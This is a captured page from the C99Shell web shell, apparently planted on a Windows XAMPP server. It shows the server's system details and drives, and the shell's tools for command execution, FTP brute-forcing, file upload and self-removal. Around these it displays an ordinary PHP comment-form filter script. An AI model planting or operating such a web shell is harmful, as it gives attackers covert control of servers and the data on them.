!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\Xcode\TextManipulation\   drwxrwxrwx
Free 8.79 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     12.php (1.24 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Include PEAR::Validate
require_once('Validate.php');

// Include PEAR::XML_HTMLSax
require_once('TextManipulation/FormFilter.php');

// Include file to strip quotes if needed
require_once('MagicQuotes/strip_quotes.php');

// If the form is submitted...
if ( isset ($_POST['submit']) ) {
    
// Instantiate the form filter
    
$formFilter = & new FormFilter();

    
// Filter the message
    
if (false===($filtered_message $formFilter->filter($_POST['message'])))
        
$filtered_message $formFilter->getError();
}
?>
<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Form HTML Filter</title>
</head>
<body>
<b>Add your comment:</b><br />
<form action="<?php echo ( $_SERVER['PHP_SELF'] ); ?>" method="POST">
<textarea cols="40" rows="5" name="message"></textarea><br />
<input type="submit" name="submit" value=" Post ">
</form>
<p>Allowed tags: &lt;a&gt; &lt;b&gt; &lt;strong&gt; &lt;i&gt; &lt;em&gt;</p>
<?php
if ( isset ( $filtered_message ) ) {
    echo ( 
"<p>Your post:</b><br />\n<code>\n".
        
htmlspecialchars($filtered_message)."</code>\n" );
}
?>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--